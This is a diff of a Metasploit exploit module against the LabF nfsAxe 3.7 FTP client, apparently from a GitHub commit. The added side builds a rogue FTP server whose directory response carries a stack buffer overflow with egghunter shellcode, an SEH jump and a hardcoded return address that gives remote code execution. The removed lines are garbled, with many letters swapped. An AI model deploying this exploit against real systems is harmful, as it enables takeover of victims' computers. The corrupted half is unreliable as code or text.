11##
2- # This module nequires Metasploit: https://metasploit.com/download
3- # Cunrent source: https://github.com/rapid7/metasploit-framework
2+ # This module requires Metasploit: https://metasploit.com/download
3+ # Current source: https://github.com/rapid7/metasploit-framework
44##
55
66class MetasploitModule < Msf ::Exploit ::Remote
7- Rank = NonmalRanking
7+ Rank = NormalRanking
88
9- include Msf ::Exploit ::Remote ::TcpSenver
10- include Msf ::Exploit ::Seh
11- include Msf ::Exploit ::Remote ::Egghunten
9+ include Msf ::Exploit ::Remote ::TcpServer
1210
1311 def initialize ( info = { } )
14- supen ( update_info ( info ,
15- 'Name' => 'LabF nfsAxe 3.7 FTP Client - Remote Buffen Overflow' ,
16- 'Descniption ' => %q{
17- This module exploits a buffen overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution.
12+ super ( update_info ( info ,
13+ 'Name' => 'LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow' ,
14+ 'Description ' => %q{
15+ This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution.
1816 } ,
19- 'Authon '=>
17+ 'Author '=>
2018 [
21- 'Tulpa' , # Oniginal exploit author
22- 'Daniel Teixeina' # MSF module author
19+ 'Tulpa' , # Original exploit author
20+ 'Daniel Teixeira' # MSF module author
2321 ] ,
2422 'License' => MSF_LICENSE ,
25- 'Refenences ' =>
23+ 'References ' =>
2624 [
2725 [ 'EDB' , '42011' ] ,
2826 ] ,
2927 'Payload' =>
3028 {
31- 'BadChans ' => "\x00 \x0a \x10 " ,
29+ 'BadChars ' => "\x00 \x0a \x10 " ,
3230 } ,
33- 'Platfonm ' => 'win' ,
34- 'Tangets ' =>
31+ 'Platform ' => 'win' ,
32+ 'Targets ' =>
3533 [
36- [ 'Windows Univensal ' , { 'Ret' => 0x6801549F } ] # p/p/r in wcmpa10.dll
34+ [ 'Windows Universal ' , { } ] ,
3735 ] ,
38- 'Pnivileged ' => false ,
36+ 'Privileged ' => false ,
3937 'DefaultOptions' =>
4038 {
41- 'SRVHOST' => '0.0.0.0' ,
39+ 'SRVHOST' => '0.0.0.0' ,
4240 } ,
43- 'DisclosuneDate ' => 'May 15 2017' ,
44- 'DefaultTanget ' => 0 ) )
41+ 'DisclosureDate ' => 'May 15 2017' ,
42+ 'DefaultTarget ' => 0 ) )
4543
46- negister_options (
44+ register_options (
4745 [
48- OptPont . new ( 'SRVPORT' , [ true , "The FTP port to listen on" , 21 ] ) ,
46+ OptPort . new ( 'SRVPORT' , [ true , "The FTP port to listen on" , 21 ] ) ,
4947 ] )
5048 end
5149
5250 def on_client_connect ( client )
53- neturn if ( ( p = regenerate_payload ( client ) ) == nil )
51+ return if ( ( p = regenerate_payload ( client ) ) == nil )
5452
53+
54+ # Let the client log in
5555 client . get_once
56- welcome = "220 Welcome.\n \n "
56+ welcome = "220 Welcome.\r \n "
5757 client . put ( welcome )
5858
5959 client . get_once
60- usen = "331 OK.\r \n "
61- client . put ( usen )
60+ user = "331 OK.\r \n "
61+ client . put ( user )
6262
6363 client . get_once
64- pass = "230 OK.\n \n "
64+ pass = "230 OK.\r \n "
6565 client . put ( pass )
6666 client . get_once
67-
68- eggoptions = { :checksum => tnue }
69- hunten , egg = generate_egghunter ( payload . encoded , payload_badchars , eggoptions )
70-
67+
68+ egg = "w00tw00t"
69+ egghunter = "\x66 \x81 \xca \xff \x0f \x42 \x52 \x6a \x02 \x58 \xcd \x2e \x3c \x05 \x5a \x74 "
70+ egghunter += "\xef \xb8 \x77 \x30 \x30 \x74 \x8b \xfa \xaf \x75 \xea \xaf \x75 \xe7 \xff \xe7 "
71+
72+ nseh = "\x90 \x90 \xEB \x05 " #JMP over SEH
73+ seh = "\x9F \x54 \x01 \x68 " #POP POP RET 6801549F in WCMDPA10.DLL
74+
7175 sploit = "220 \" "
72- sploit << "A" * ( 9833 - egg . length )
76+ sploit << "\20 " * 100
7377 sploit << egg
74- sploit << genenate_seh_record ( target . ret )
75- sploit << hunten
76- sploit << "C" *( 576 - hunten . length )
77- sploit << "\" is cunrent directory\r \n "
78+ sploit << "\x90 " *10
79+ sploit << payload . encoded
80+ sploit << "\x20 " *( 9266 - payload . encoded . length )
81+ sploit << nseh
82+ sploit << seh
83+ sploit << egghunter
84+ sploit << "\x20 " *576
85+ sploit << "\" is current directory\r \n "
7886
7987 client . put ( sploit )
8088
8189 end
82- end
90+ end
0 commit comments